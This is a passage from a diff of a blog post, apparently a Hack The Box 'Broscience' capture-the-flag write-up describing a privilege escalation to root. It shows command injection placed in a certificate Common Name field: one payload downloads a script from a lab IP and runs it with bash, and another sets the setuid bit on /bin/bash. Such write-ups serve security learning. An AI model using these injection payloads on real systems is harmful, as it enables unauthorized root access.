hanzbzz/hanzbzz.github.io/_posts/2023-04-09-HTB-broscience.md

 Common Name (e.g. server FQDN or YOUR name) []:$(wget 10.10.14.169:8000/x -O x;bash x) ...
 ```
 This works, and i get a shell as root, but it crashes after a few seconds.
-I think it's probably because of the `timeout` command.
-To deal with this, i will just use differnet payload, this one give the setuid permissions to bash:
+I think it's probably because of the `timeout` command in the cronjob.
+To deal with this, i will use differnet payload.
+This time, i will add the setuid permissions to bash:
 ```bash
 $(chmod u+s /bin/bash)
 ```
-After two minutes, i check `bash`, see that it has the setuid bit set and use it to get root.
+After two minutes, i check `bash` and see that it has the setuid bit set.
+Ican use it to get root shell.
 ```
 bill@broscience:~/Certs$ ls -la /bin/bash
 -rwsr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash